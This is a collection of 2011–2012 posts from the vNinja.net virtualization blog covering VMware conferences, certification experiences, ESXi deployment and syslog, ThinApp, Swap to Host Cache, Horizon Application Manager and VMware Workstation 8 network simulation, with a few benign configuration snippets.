I really love seeing #3 being something that might actually happen, considering it's something we discussed with Hal Rottenberg in vSoup #23: Better Late Than Never. The idea wasn't just the flash talks, but also to get them recorded on VMware TV and streamed live. That adds some additional merit to it, even if it's only a 10-minute session. Hopefully there will be enough interest in this to actually make it happen. After all, the virtualization community lives and breathes content and idea sharing; this is just an extension of it. Option #1 seems like a lot of effort, and might be very costly unless someone offers to sponsor the event itself, and even if that's a possibility, getting people to physically attend such a conference might prove very difficult. A physical un-conference might be a good idea for those traveling regardless of whether their session was accepted or not, but for those unfortunate enough that their VMworld attendance was hinging on session approval, attending such an event seems improbable. People are already having trouble convincing their management that attending VMworld is worth the cost; imagine trying to convince them that you need to go to an un-conference for "the rejects"? Don't get me wrong, I understand that there have to be a lot of rejected sessions and that only a select few get accepted. I believe that is fair, and my intention is not to criticize VMware for it. If anything, looking at the list of "rejects", it speaks volumes about the sessions that were indeed selected. My congratulations go out to everyone who got through the eye of the needle, and at the same time it's very interesting to see that people who submitted rejected sessions still plan on making the most of it. Obviously there are a lot of good ideas out there, waiting to get exposed to the world.
Of course, a #v0dgeball game between those who got rejected and those who got accepted is a great idea too (as gminks put it: "Maybe there needs to be a #v0dgeball team of rejected vmworld proposals vs accepted proposals")! --- # Thinapped vSphere Client Updated to V5.0 URL: https://vNinja.net/vmware-2/thinapped-vsphere-client-updated-v5-0/ Date: 2012-05-31 Author: christian Tags: Free Tools, fun, realworld, ThinApp, VMware, vSphere The ThinApped vSphere Client has finally been updated to v5.0, and is readily available for download! Sadly the new version is v5.0 only, and will only allow you to connect to vSphere v5 hosts, and since the new release has replaced the old release on the VMware Fling website, you're out of luck if you haven't already got the 4.0 version stowed away in your own private locker. I hope VMware decides to either make the 4.0 version available for download as well, even if 5.0 is the current release, or at least create a new download package for 5.0 that also includes the 4.0 and 4.1 versions. I know this is a Fling, and that it's _unsupported_ by nature, but I really think that this is a good idea, that is, if it's kept current with the vSphere release cycles. If that's not possible, it should be removed and administrators should be instructed on how to create their own "ThinApped" version. After all, it's really not that hard to do. --- # VMware Forum 2012 Oslo URL: https://vNinja.net/virtualization/vmware-forum-2012-oslo/ Date: 2012-04-26 Author: christian Tags: conference, event, Oslo, Travel, VMware, VMware Forum Just like last year, I got up really early and caught a 06:40 am flight from Bergen to Oslo to attend the VMware Forum. A couple of things have changed since the last time, one of them being the venue. This time around it was held at Ullevaal Business Class, and the venue itself worked great for a one-day conference like this, divided into three sections, two for parallel sessions and one for the exhibitor area.
One of the other changes from last year is that I now work for a VMware Partner, who was also a Platinum Sponsor of the event. This was my first event working for a partner, and I even had booth duty! Talking with customers in a partner setting is quite different from being a customer yourself, so that was interesting in and of itself. Sadly this also meant that I missed most of the sessions, but I did manage to catch the keynote by Brian Gammage, VMware's Chief Market Technologist. I even got a "1-on-1" session with Mr. Gammage, accompanied by a couple of my colleagues from EVRY Consulting, which was really interesting to say the least. Listening to someone extremely knowledgeable and visionary, in a small non-speaking setting, was an eye-opener with regard to how VMware sees the future of end-user computing. Sadly I can't go into details about it, but I'm confident that VMware has a strategy in the works that might just surprise more than a few people. Unfortunately this "1-on-1" session collided with both Joel Lindberg's and Lee Dilworth's sessions, so I didn't catch either of those, which in reality were the two sessions I was looking forward to the most beforehand. Also, what's up with scheduling both of those sessions against each other? That sounds like a bit of bad planning from the organizing committee. I did however get to meet both of them in the exhibition area, even if only ever so briefly. I also met up with both Vegard Sagbakken and Stein Willhelmsen from VMware, Mike Beevor from Whiptail and Linus Svensson from Veeam. All in all I think VMware Forum 2012 in Oslo was a step in the right direction compared to last year, but it's still not a very technical event, and I don't really think it is supposed to be. Perhaps my expectations for it last year were a bit high, and this year they might just have been a bit too low. Oh, I even spotted Cody Bunch's Automating vSphere with VMware vCenter Orchestrator book in the wild!
--- # VCDX Wannabe goes live URL: https://vNinja.net/virtualization/vcdx-wannabe-live/ Date: 2012-03-27 Author: christian Tags: Certification, VCDX, VCDXWannabe My little pet project VCDX Wannabe has now (finally) gone live. For now it's mostly a collection of links and resources, but that will change over time. So, if you want to see me (and possibly a few others) either go down in flames, kicking and screaming, or succeed in obtaining the VCDX certification, you now have the opportunity to do so. --- # vCenter Client Download URLs URL: https://vNinja.net/vmware-2/vcenter-client-download-urls/ Date: 2012-03-12 Author: christian Tags: Download, featured, Self Help, vCenter Client, VMware, vSphere Since the vCenter Client is no longer bundled with an ESXi host installation, I've compiled a quick list of direct download URLs for the most recent clients. Update 17th September 2014: # VMware has published the official list in knowledge base article KB2089791, use that as the official list going forward. Remember, the client download URL is still available from the vCenter server, if you point your browser to it. Another way of getting hold of the client is from the vCenter ISO file downloadable from vmware.com. 10 September 2014: Table updated to include new version for 5.5 update 2 [table id=8 /] --- # My VCP 5 exam experience URL: https://vNinja.net/virtualization/vcp-5-exam-experience/ Date: 2012-02-29 Author: Tags: Like many others I was a VCP 4 and needed to upgrade to VCP 5 by Feb 29th to avoid a pricey class and possible ribbing from my peers. I had been well aware of this deadline since mid-December; however, I procrastinated on studying and was mostly flinging myself around the globe doing implementations and having an all-around good time. When Feb 1st came I was sitting on a flight from Saigon to Frankfurt, and that is when panic struck. I realized I had until the end of the month to finish the requirement.
I instantly pulled out my iPad and began frantically combing through the VCP 5 Blueprint and reading countless documents over the 12+ hour flight. When I returned home, I really began to crack the books. When I was too tired to keep reading official vSphere docs or playing in my lab, Cody Bunch's Professional VMware Brownbags were perfect to sit, listen and absorb some info. They were really helpful, as they go through each point of the specific objective of the day and also get some insight from guests who had already taken the exam. Another great resource is Andrea Mauro's vInfrastructure VCP 5 notes - there was tons of helpful information there. Also not to be forgotten is MW Preston's VCP 5 resources. Finally, I would never study for a VCP exam without using the great practice exams available from Simon Long of the SLOG Blog. While there are many other great resources available, there are too many to list here, as this is an experience post. So after combing through all these resources for hours per night for a couple of weeks, I finally booked my exam for Feb 28th. That is when the nerves really set in. I started to doubt whether, with 3 weeks of studying, I had prepared enough, or if I was going to be surprised with a lot of new content. So I pushed on and continued reading, and possibly obsessing over particular objectives I was not 100% comfortable with, until the days ran out. On test day I left work after lunch and drove to the test center. During check-in I was a bit nervous and began having trouble speaking Swiss German to the testing center staff. I sat down and first took the survey, which made me even more nervous knowing the test was coming soon. When the test began and I got through the first 20 questions, my nerves began to lighten. I realized all the vSphere 5 implementations I did recently, along with reading up on some of the new features, was the ticket.
Without getting too much into details, as I am bound by NDA, this exam was more about knowing the product and working with it on a day-to-day basis than about straight memorization. For the VCP 4 I remember spending countless hours memorizing Configuration Maximums and other things that promptly left my head after the test was completed. After all, that is what the Configuration Maximums documents are for! In conclusion, I think that for actual virtualization professionals who have their hands on the product every day, VCP 5 is much easier than VCP 4. In the end I only spent an hour and 10 minutes on the exam, and passed with a score I was highly pleased with. My message to current VCP 4 holders is: go ahead and take a shot at the exam. You might be pleasantly surprised with how VMware has changed the structure of their exams. --- # Being Neil Armstrong URL: https://vNinja.net/rant/neil-armstrong/ Date: 2012-02-26 Author: christian Tags: Certification, Harakiri, Neil Armstrong, Nutjob, VCDX, VMware Now there is an ambitious post title if there ever was one, but it seems fitting, as the next 12 months promise to be my most ambitious professional year to date. Like Neil, I've started a journey that could either crash and burn, or end up with my very own personal moon landing. Those of you that follow my antics on Twitter already know what I'm talking about, but I'll spell it out once and for all: I've decided to go for the VCDX certification, and hopefully complete it within a timeframe of about 12 months. With my new role as a Senior Consultant for EVRY, certifications all of a sudden play a major role in my day-to-day work, so why not go all in and go for the top? I've been considering this for a while, but the last few months have solidified the idea that I should just go gung-ho and aim for the stars. So here I am, sticking my neck out and making this public knowledge. I'll try my best to stick to the plan newly accredited VCDX Hugo Phan published after his defense.
“In much of society, research means to investigate something you do not know or understand.” – Neil Armstrong So there you have it, this Norwegian has lost his mind and (for now) lives to tell about it. Wish me luck, I am certainly going to need it. --- # VMware Virtual Customer Labs URL: https://vNinja.net/news/vmware-virtual-customer-labs/ Date: 2012-02-04 Author: christian Tags: Hands-On, labs, VMware, vCL I’ve mentioned this earlier, in VMware hands-on labs going public in 2012, but finally it seems like something is happening in that regard! Scott Sauer has announced the availability of “VMware Virtual Customer Labs” (vCL), where he walks us through the setup and delivery of the new vCL offering. At the moment it’s only available to “selected customers”, supported by a VMware pre-sales engineer, and the number of labs is limited. It’s still a work in progress, and I’m sure great things will come out of this! Now, how do I get access to it as a partner? Also, I wonder what possibilities lie in this with regard to alternative VCP requirements? --- # VCP 5 Certification Requirements Clarification URL: https://vNinja.net/vmware-2/vcp-5-certification-requirement-clarification/ Date: 2012-02-03 Author: christian Tags: Certification, Rant, VCP, VMware In a recent article, VCP 5 certification course deadline looms over VMware pros, both vNinja.net contributors (Christian and Ed) are quoted in relation to the VCP 5 certification upgrade deadline of February 29th 2012. While I can’t speak for Ed, I can clarify my own comments a bit. The following is a quote from VMware, taken from the article in question: “That requirement is in place to maintain the integrity of the certification. If people could pass the VCP 5 without exposure to and hands-on experience with vSphere 5, it would devalue the certification,” a VMware spokesperson wrote in an email.
While I do see why VMware has that stance, and why they try to keep the exam “real”, my problem is that there is no way for anyone to get the VCP certification without classroom training. I don’t mind that VMware has a training requirement, and I don’t mind that you have to pay for it. What I do have a problem with is that I’m required to sit a 5 day training class. Why not offer an online VCP prep course that you can complete at your own pace, complete with a pre-exam test that you can use to validate your skill set? That way VMware can still require a minimum of training pre-exam, and get paid for it, while students can do their training at their own pace, when they have time available for it. Seems like a win-win (bingo!) situation to me. As far as I’ve heard, the VCP5 exam focuses less on minimum and maximum configuration limits than the VCP4 did, which is a good thing, but at the same time I don’t think the Install, Configure and Manage course by itself is enough to pass the exam, so in essence VMware is already “devaluing” their own exam by requiring training that does not cover the entire curriculum. The hands-on requirement is a good one, and I applaud it; the best way to ensure it would be to turn the VCP exam into a hands-on lab environment where you get tasks to complete, instead of multiple choice questions. Disclaimer: I have not yet attempted the VCP 5 exam, and I’m only commenting based on feedback provided by others who have. As for the time available for existing VCPs to upgrade from VCP4 to VCP5, I also believe the timeframe is too short, and to be completely honest I don’t really see why there should be a time limit at all. After all, if you have the VCP4, you pretty much know what you’re in for with regards to the VCP5. Why rush it, and have people attempt to upgrade before they are ready? Let people do this on their own, on their own schedule; I don’t see how VMware benefits from enforcing a timeframe at all.
Unless the motivation is selling more training, of course. --- # Vote for the Top VMware & Virtualization Blogs URL: https://vNinja.net/news/vote-top-vmware-virtualization-blogs/ Date: 2012-01-24 Author: christian Tags: fun, Virtualization, Vote Eric Siebert has opened up the voting for the top VMware & virtualization blogs. Head on over and cast your votes! Votes for vNinja.net and vSoup.net would be greatly appreciated, but since we’re not affiliated with the Dutch vMaffia we promise that you will not have to wear concrete boots or wake up to a horse’s head in your bed if you don’t vote for us. We think. --- # Iomega IX2 and Time Machine Support URL: https://vNinja.net/osx/iomega-ix2-time-machine-support/ Date: 2012-01-23 Author: christian Tags: Firmware, Hack, Iomega, IX2, Mac, OS X As Mr. Simon Seagrave has pointed out, there is a fix available to enable OS X Lion Time Machine support for Iomega IX2 and IX4 NAS storage devices. I decided to take this a little step further, and try to upgrade my old (and discontinued) Iomega IX2-200 to the new IX2-200 Cloud Edition firmware. Initially this was a big failure, as I seemingly managed to brick my device. It was only responding to pings (so the TCP/IP stack was loaded and working), but I could not bring up the web-based management tool, nor connect via telnet or SSH. Thankfully Will van Antwerpen had investigated the firmware upgrade to Cloud Edition a bit more than I had, and pointed me to the General NAS-Central Forums, where I found a link to a great HowTo explaining the entire process: Upgrading Iomega ix2-200 to Cloud Edition. As that article also mentions, I had to do the process twice to get it to kick in, un-brick my IX2-200 and get it running with the new Cloud Edition firmware. After configuring the IX2 with security and setting up Time Machine on the MacBook Air, Time Machine seems to be running without problems.
Excellent! --- # Creating and Using a Virtual Floppy in vSphere URL: https://vNinja.net/virtualization/creating-virtual-floppy-vsphere/ Date: 2012-01-07 Author: christian Tags: Bitlocker, Encryption, ESXi, Floppy, TPM, vSphere My new colleague Olav Tvedt asked me if I could test his method of enabling Bitlocker in a VM on VMware vSphere. Of course, I was happy to oblige. I followed the same steps as he did in his Running Bitlocker on a Virtual computer post, and it worked perfectly. The only real difference between doing this in Hyper-V and on ESXi is that the virtual floppy drive on ESXi by default doesn’t emulate an empty floppy. So, in order to mount a virtual floppy you need to create a new floppy image. Thankfully the vSphere Client can do this for you! To use the vSphere Client to create a floppy image you can later mount in a VM:
1. Edit the VM’s settings and find the floppy drive. If the VM doesn’t have one, add one, close the window, and return to the VM settings once the floppy drive has been added.
2. Select “Create new floppy image in datastore:”.
3. Click the Browse button and browse to your preferred location for the floppy image.
4. Name it, and click OK.
5. Click OK again to close the VM settings window and return to the vSphere Client.
There you go, an empty virtual floppy image that you can mount in a VM has been created. To mount the image, find the floppy drive icon in the vSphere Client and select the “Connect to floppy image on a datastore” option. Browse to the location where you created the floppy image, and select it. Now the VM has an empty floppy that you’ll need to format before you can use it. Follow Olav’s guide to encrypt the boot drive with Bitlocker, without the need for a TPM chip or a USB device connected to the VM! And yes, it works, as you can see here: So much for never needing a floppy disk again. Oh, and by the way, you can of course do this in VMware Workstation 8 as well.
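As a side note, a blank floppy image can also be created by hand from a shell; this is only a minimal sketch, assuming a POSIX shell and using /tmp purely for illustration. On an actual ESXi host you would target a datastore path such as /vmfs/volumes/<datastore>/ instead.

```shell
# A standard 1.44 MB floppy is 2880 sectors of 512 bytes = 1,474,560 bytes.
# Writing to /tmp here for illustration; on ESXi you would use a datastore
# path such as /vmfs/volumes/<datastore>/blank-floppy.flp instead.
IMG=/tmp/blank-floppy.flp
dd if=/dev/zero of="$IMG" bs=512 count=2880 2>/dev/null

# Show the resulting size in bytes.
wc -c < "$IMG"
```

Like the image the vSphere Client creates, this one still needs to be formatted from inside the guest before it can hold files.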
--- # Building The Ultimate vSphere Lab Series URL: https://vNinja.net/news/building-ultimate-vsphere-lab-series/ Date: 2012-01-03 Author: christian Tags: Lab, Sammy Bogaert, VMware, vSphere, Workstation Sammy Bogaert has posted a 12 part series called “Building The Ultimate vSphere Lab”, which knocks the socks off my previous vSphere 4.x series. In reality this means that my planned series for vSphere 5.x is now cancelled, as there is no need to duplicate Sammy’s efforts. Be sure to check the series out! --- # Goodbye 2011, you were great URL: https://vNinja.net/news/goodbye-2011-you-were-great/ Date: 2011-12-30 Author: christian Tags: 2011, Christian Mohn, fun, Statistics, vNinja Yes, this is YAEotYP, so if you’ve already read tons of them I apologize. 2011 - My personal view # 2011 has been a steamroller of a year. The vSoup Virtualization Podcast aired for the first time, and we’ve recorded and published 19 full episodes in its inaugural year. I was awarded the vExpert title for the first time, and even got invited to Tech Field Day #6 in Boston. In addition to this, I wrote a white paper for Veeam, was included in the Server Virtualization Advisory Board, joined Rick Vanover for a Veeam Community Podcast, and appeared in two video interviews: one with Mike Laverick about the #VMTNSubscriptionMovement, and one where Eric Sloof ambushed me with a camera while visiting Bergen. Lots of exciting projects were started in 2011, including my PowerCLI based automation project for vessel installations and migrating from standalone ESX hosts to blade servers (HP c7000 + Virtual Connect/Flex10), in addition to the normal day to day operations. And after 8 years at Seatrans AS, I handed in my papers, moving on to a new role at EDB ErgoGroup. 2011 vNinja.net Statistics # 2011 was the first full year this site existed, so I can’t really compare the traffic it has received with 2010, but based on the few months it existed in 2010, the traffic increase has been enormous.
2011 Facts #
Busiest Day: September 15th
Busiest Month: September
Top 5 articles:
1. Installing Windows 8 Developer Preview in VMware Workstation 8
2. VMware Workstation 8 — What’s new?
3. Using USB Pass-through in vSphere 4.1
4. VMware vSphere Lab: Virtual Edition — Part 1
5. Installing and configuring VMware vCenter Operations
Top Referrers (not counting search engines/Twitter):
- Planet v12n
- VMware Communities
- ESX Virtualization
- About.me
- vm4.ru
And that’s it for 2011. Personally, 2012 looks even more promising, and hopefully my exposure to more diverse environments will be reflected back on the site, as I’m certain it will spur more posts and more interesting discussions. See you in 2012, I think we’re in for a cracker. --- # Auto Installation and Configuring of vSphere ESXi 5 URL: https://vNinja.net/virtualization/auto-installation-and-configuring-of-vsphere-esxi-5/ Date: 2011-12-21 Author: christian Tags: automation, ESXi, fun, Ops, PowerCLI, Powershell, realworld, Virtualization, VMware One of the last projects I’ve been involved with at Seatrans is automating the installation and configuration of vSphere ESXi 5 hosts for deployment on vessels. I’ve talked a bit about this before, both on vSoup and in Setting Up Automated ESXi Deployments, where I outlined my PXE and PowerCLI based installation and configuration scheme. Not much has changed since then, except updating the PXE server to offer ESXi 5 instead of ESXi 4, and a lot of work has been put into the scripting, including a front-end GUI for the PowerCLI script itself. The end “product” is now in place for mass deployments for internal use. The following video shows how the PXE based installation works, as well as a run through the now GUI based configuration tool, aptly called the Seatrans Hypervisor Installation Tool.
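For context, a PXE-driven scripted ESXi 5 installation of this kind is normally driven by a kickstart file fetched at boot. The actual Seatrans scripts are not published, so the following is only a generic, minimal sketch; the root password, DHCP networking and vmnic0 device are placeholders, not the real configuration:

```
# Generic ESXi 5 kickstart (ks.cfg) sketch - placeholders only,
# not the Seatrans Hypervisor Installation Tool configuration.
vmaccepteula
rootpw ChangeMe123!                   # placeholder root password
install --firstdisk --overwritevmfs  # install to the first detected disk
network --bootproto=dhcp --device=vmnic0
reboot
```

Host-specific settings (networking details, NTP, datastores and so on) would then typically be applied afterwards by a PowerCLI script, which is the role the GUI tool described here plays.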
The video jumps a bit between two VMs: one running Windows Server 2008 R2, which runs the DHCP/PXE services and the PowerCLI script, and one that gets ESXi installed and configured: This goes to show that you can create your own specialized and portable deployment solution, without requiring elaborate network configurations or reconfiguration of existing infrastructure. Note: I will not be providing downloadable versions of the final script at this time. The reason for this is quite simple: it’s very specific, and tailored for a non-generic environment. If I can manage to find the time, I’ll post a generic version later, but in order for anyone else to utilize the PowerCLI scripts I’ve created, a lot of work is required. --- # DaaS or Having Fun with ThinApp URL: https://vNinja.net/virtualization/daas-or-having-fun-with-thinapp/ Date: 2011-12-09 Author: christian Tags: DaaS, Doom, fun, ThinApp While using ThinApp to create a standalone version of TweetDeck 0.38.2, since the newly announced 1.0 version looks, acts and feels like a 0.1 version, I posed the following question on Twitter: ["Hrm, what other apps should i #ThinApp while I'm at it?"](https://twitter.com/#!/h0bbel/status/145249562490179585). Kevin Kelling immediately responded with “Doom”. Naturally, I decided to give it a go. A quick download of ZDoom and a run through the ThinApp Setup Capture later, the following was born (view in full screen for better viewing): Thus, DaaS (Doom as a Service) was born as a concept. --- # Blatant Self Promotion URL: https://vNinja.net/virtualization/blatant-self-promotion/ Date: 2011-11-28 Author: christian Tags: Podcast, Quotes, Veeam, Virtualization, VMTN As the title says, it’s been one of my more “public” weeks ever. Besides my “normal” vSoup engagement, this week I’ve also been involved with Mike Laverick’s VMTN Subscription Movement Miniwags to voice some of my views about the #VMTNSubscriptionMovement.
Fair warning: This is video, and please remember that during recording, Movember was nearing its final phase. VMTN Subscription Movement Miniwags – Christian Mohn Secondly, I was a guest on the Veeam Community Podcast Episode 45 – vSphere 5 Storage Potpourri. Third, and last, SearchServerVirtualization posted VMware vSphere Storage Appliance: Devil’s in the details, which also includes some commentary from yours truly regarding the VSA. --- # Testing VMware vSphere 5 Swap to Host Cache URL: https://vNinja.net/vmware-2/testing-vmware-vsphere-5-swap-to-host-cache/ Date: 2011-11-22 Author: christian Tags: Experiment, Host Cache, SSD, VMware, vSphere 5 A little while ago I fitted a small 64GB SSD disk to my HP MicroServer, just to have a quick look at the new vSphere 5 feature Swap to Host Cache, where vSphere 5 reclaims memory by storing swapped-out pages in the host cache on a solid-state drive. Naturally, this is a lot faster than swapping to non-SSD storage, but you will still see a performance hit when it happens. For more details on Swap to Host Cache, have a look at Swap to host cache aka swap to SSD? by Duncan Epping. Now, in my minuscule home lab setting it’s somewhat hard to get real, tangible performance metrics, so my little experiment is non-scientific and only meant to illustrate how swap to host cache gone wild would look in a real-world environment. After installing the SSD drive and configuring Swap to Host Cache, I created two VMs ingeniously called hostcacheA and hostcacheB. Both were configured with 14GB of memory, which should nicely overload my host, which has a whopping 8GB of memory in total. Now, with memory features like ballooning, transparent page sharing, and memory compression in play, I needed to make sure that the memory was actually used, and in addition it had to contain different datasets to make sure that the host cache actually kicked in.
To make sure of this, I downloaded the latest ISO version of Memtest86+ and connected it to the empty VMs. When starting the VMs, they immediately started testing their available memory, and sure enough, they started eating into the host cache. As you can see from the screenshot below, the longer the memtest ran, the more host cache was utilized. Bonus points for figuring out when the test VMs were shut down… So there it is, performance graphs showing that the host cache is indeed kicking in and getting a run for its money. Since this was a non-scientific experiment, I don’t have any real performance counters or metrics to base any sort of conclusion on. All I was after was to see if it came alive, and clearly it did. --- # VMware Horizon Application Manager Now and Beyond URL: https://vNinja.net/virtualization/vmware-horizon-application-manager-now-and-beyond/ Date: 2011-11-16 Author: christian Tags: App delivery, Horizon, Horizon Application Manager, SaaS, ThinApp, Virtual Application, VMware VMware has announced Horizon Application Manager 1.2, and together with the new ThinApp 4.7 release it promises “end users access to Windows, SaaS and enterprise web applications across different devices while retaining control and visibility via policy-driven management”. VMware Horizon Application Manager now manages your ThinApp applications, making it easier and faster to provide virtualized Windows applications to end users. From Horizon Administration, you can deploy ThinApp packages, entitle users and groups, track user licenses, and manage application updates. The coupling of Horizon Application Manager with ThinApp is a great idea, and when I saw today’s announcement I got pretty excited. The possibility of having your own internal application portal, providing your end users with self-service installs of virtualized applications, is great news and could potentially be really useful in a great number of organizations.
Sadly my initial excitement quickly faded when I realized that, for now, Horizon Application Manager is a hosted service that requires an on-premise connector in your infrastructure, which sends over a limited set of Active Directory data to enable it to check user account or group access to the applications it offers. The connector provides single sign-on (Kerberos) functionality for users already authenticated in your Active Directory, and authenticates the user to the Horizon service using SAML, so the hosted service never has the AD password. The hosted service does still need some information, like sAMAccountName, first name, last name, email and a GlobalUID. For more details, have a look at Understanding VMware Horizon Application Manager by Eric Sloof. This also means that for users who run a virtualized application provisioned by Horizon Application Manager, an active internet connection is required, even if the virtualized application packages are stored on a file share local to the user. Subsequent application launches do not require an active connection, as the applications are copied to the local system on the initial run. The Horizon agent retrieves a lease for the application from the Horizon service, for an administrator-configurable number of days (30 days by default), and the end user can run the application without connecting to the Horizon service until the lease expires or is renewed. For many organizations, including mine, this poses a real problem. “Handing over” Active Directory data to a hosted service is not something I would want in my environment, especially when our use case would be to provide end users with a self-service application portal for local applications. Other organizations might look at that differently though, and this might not be a concern for all customers. I understand that Horizon Application Manager was initially created for SaaS scenarios, where a hosted authentication portal makes sense.
I also understand that this is the first version that provides integration with ThinApp, and that this is very much a product still in development and refinement. For now, Horizon Application Manager does not provide the use case that I was looking for, but thankfully Ben Goodman, Lead Evangelist for VMware Horizon, has taken the time to address my call for an on-premise version of Horizon Application Manager: “I understand your apprehension. Horizon was built on top of technology originally designed exclusively to be a Single-Sign on service to SaaS applications. We are in the process of expanding that technology to become a true enterprise service. This is happening in two ways, the first is by adding application support beyond SaaS. The first step was Windows support via ThinApp and we are looking at other application platforms to follow. The second is evaluating options for moving some or all of product on-prem. Both of these steps are the primary focus of the development team over the next 12-18 months and we are really excited about where we are taking Horizon.” This is great news; an on-premise version that provides exactly what I’m looking for seems to be in the pipeline and on VMware’s roadmap for Horizon Application Manager. I just wish I had it now, as it would have been perfect for a project I’m working on at the moment that I hope to wrap up by the end of the year. Oh well, there is always next year and the next project! --- # VMTN Subscription URL: https://vNinja.net/virtualization/vmtn-subscription/ Date: 2011-11-05 Author: christian Tags: Home Lab, Licenses, Trial, VMTN Subscription Mike Laverick has started something of a petition to bring back the VMTN Subscription option, and I could not agree more! The VMTN Subscription was a way for interested parties to pay for a year’s subscription to VMware products, akin to the Microsoft TechNet subscription program.
It was not intended for production use, but was a means to get hold of products for lab work, testing and development. I don’t understand why VMware pulled the plug on that option back in 2007, but I do understand why it’s time to bring it back to life. As is the case with Mike, as a vExpert I can probably get hold of all the bits and pieces on my own, but not everyone has the same opportunities, and I’m sure that limitation is actually stifling community knowledge. The VMware community is filled with great resources, available and shared between its members; all we want is for VMware to enable the community to grow even more by facilitating home labs, test environments and exploration of their products. That has to be in VMware’s own interest too. It’s not like we’re looking for a free lunch here; what we’re looking for is something between the 60-day trial versions and the fully production-licensed products. After all, we don’t like rebuilding our labs every 60 days, do we? The announcement of the VMware labs going public in 2012 is a step in the right direction; a reinstatement of the VMTN Subscription would be another big step. Come on VMware, I know you have it in you! If you want to add your own voice to the discussion, have a look at this VMware Communities discussion thread; it’s already got some traction, and the more attention it gets the better. --- # Why Can't I Syslog my VMware ESXi Installation? URL: https://vNinja.net/virtualization/why-cant-i-syslog-my-vmware-esxi-installation/ Date: 2011-11-04 Author: christian Tags: ESXi, ESXi 5, Feature Request, Installation, Syslog Juan Manuel Rey’s post Monitor ESX 4.x to ESXi 5.0 migration process shows how you can watch the progress of an ESX 4 to ESXi 5 upgrade procedure by looking at the live logs. While this is very useful, and in many cases a real learning experience, it got me thinking that these logs should be available remotely as well.
Since ESXi supports, and actively encourages, the use of an external syslog service for log file safekeeping and monitoring, shouldn’t the installation logs for ESXi also be logged externally if so configured? Thinking that I couldn’t be the first person to have thought of this, I looked through the scripting section of the vSphere Installation and Setup guide for vSphere 5.0, and I was very surprised to see that there is no option to configure syslogging until after the installation is finished and the host configuration script(s) (ks.cfg) run. By using a ks.cfg script you can automatically configure syslog settings, but since that happens after the installation is done, and the host is potentially rebooted, the installation logs are lost (ESXi logs are not persistent by default) unless you run something that copies them over to another location before the reboot happens. Of course, when I asked on Twitter, the Godfather of Ghetto, William Lam, responded that you could always create a Python script that runs after the install, before a reboot, and uploads the logs to a syslog server. While this is all fine and dandy, I would still like to have the option to configure a syslog server during the installation, and have the installation procedure fling all its log goodness at the syslog server while the installation runs. With new features like Auto Deploy being utilized, having these logs automatically gathered (without ghetto-hacking the installation) in a central location sounds like a really good idea to me. Surely, I’m not the only one? Is this something that has enough brains behind it to actually warrant a proper feature request being filed with VMware?
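To make the limitation concrete: the earliest point at which a scripted install can set up syslog is a %firstboot section in ks.cfg, which runs only after the installer has finished and the host has booted. A minimal sketch, assuming ESXi 5’s esxcli syslog namespace and a placeholder loghost address:

```
# ks.cfg %firstboot sketch: this runs on the first boot *after* installation,
# so the installer's own log output is still never shipped remotely.
%firstboot --interpreter=busybox
esxcli system syslog config set --loghost='udp://192.168.1.10:514'   # placeholder address
esxcli system syslog reload
```

Useful for everything from the first boot onwards, but it does nothing for the installation-time logs this post is asking about.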
--- # My Personal vMotion URL: https://vNinja.net/news/my-personal-vmotion/ Date: 2011-11-04 Author: christian Tags: Change, EDB ErgoGroup, Personal, Seatrans, Work Every once in a while an opportunity presents itself that is just too good to pass up, and after 8 years at Seatrans AS I’ve decided to move on and accept a position as a Senior Consultant in the Infrastructure Consulting division of EDB ErgoGroup. Seatrans has been a fantastic employer, and without the backing and support I’ve had over the years, I would not be in a position where this change would be possible. It was with mixed emotions that I handed in my notice, but I’m 100% certain that this is the right move, at the right time, for me personally. As a consultant my main focus will still be virtualization in general, and VMware solutions in particular. The upside to this is that I will definitely be able to work even more with the technology closest to my heart, and with a larger team that has a similar passion for technology. Moving back to the consultant side of the table should be an interesting challenge, and one that I’m really looking forward to. The blog will stay the same; perhaps this change might even bring in more content, as I’m going to be exposed to a lot of different infrastructures and challenges. I’ve also set a couple of pretty hefty personal goals for 2012, but I’ll keep those to myself until I see how everything pans out. 2012? Bring your A game, because I’m awake, strong and ready! --- # Moving On URL: https://vNinja.net/news/moving-on/ Date: 2011-09-23 Author: christian Tags: if ((Get-date) -gt (Get-date 2012-01-01)) {Get-VM h0bbel | Move-VM -Datastore newEmployer -RunAsync } More details later.
--- # Network Simulation in VMware Workstation 8 URL: https://vNinja.net/virtualization/network-simulation-in-vmware-workstation-8/ Date: 2011-09-15 Author: christian Tags: Networking, Ops, VMware, Workstation 8 In the new VMware Workstation 8 release, VMware has added a rudimentary network simulation setting where you can tweak bandwidth and packet loss for a given network card. Very useful when you are testing applications and servers and want to know how they react to network issues, or if you want to simulate a WAN link. I know this was available in Workstation 7 as well, but it used to be a team feature. Now it’s a per-vNIC feature, which makes it much more usable. Configuring it is very easy, but you need to know where to look to be able to find the feature. Configuring Network Adapter Advanced Settings in VMware Workstation 8 #
1. Find your VM, right-click it and select Settings.
2. Select the Network Adapter and click the “Advanced…” button. This brings up the Network Adapter Advanced Settings window, where you can tweak the network settings, including inbound/outbound bandwidth and packet loss percentage. There are a number of predefined settings for bandwidth, making it easy to simulate various scenarios like ISDN, cable, a leased T3 and so on. You can even modify the virtual network card’s MAC address in the same window, if you need to do that.
3. Tweak the settings, and the new bandwidth and packet loss settings will immediately be applied to the VM.
Configuring Network Adapter Advanced Settings in VMware Workstation 8: Video Demo # Conclusion # I love this. In my day job I’m often faced with simulating how different applications work over some rather wonky WAN lines, and building this kind of feature set into VMware Workstation 8 makes a lot of sense. I do hope they improve it in the future though, as I would really like to see tweakable settings added for latency as well, which often is the main killer in WAN environments.
